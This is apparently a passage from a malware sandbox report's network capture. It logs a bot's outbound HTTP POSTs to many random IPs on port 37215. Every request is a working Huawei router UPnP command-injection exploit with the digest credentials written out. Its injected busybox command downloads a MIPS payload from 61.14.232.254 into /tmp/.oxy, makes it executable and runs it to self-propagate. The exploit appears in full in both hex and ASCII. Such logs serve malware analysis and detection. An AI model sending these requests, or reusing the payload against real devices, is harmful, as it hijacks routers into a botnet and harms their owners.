20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1272192.168.2.1344008118.241.255.16337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.532346964 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1273192.168.2.1358084157.154.56.17337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.532378912 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1274192.168.2.133750641.235.201.20937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.532408953 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1275192.168.2.1351980197.190.74.3237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.532610893 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1276192.168.2.1353478197.65.84.23537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.532676935 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1277192.168.2.135232241.140.139.4537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.532694101 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1278192.168.2.1351446157.101.186.21537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.532799959 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1279192.168.2.1358504197.106.114.18837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.532831907 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1280192.168.2.1354632157.216.81.12137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.532861948 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1281192.168.2.1342830197.79.184.24537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.532880068 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1282192.168.2.135462241.55.192.23637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.533168077 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
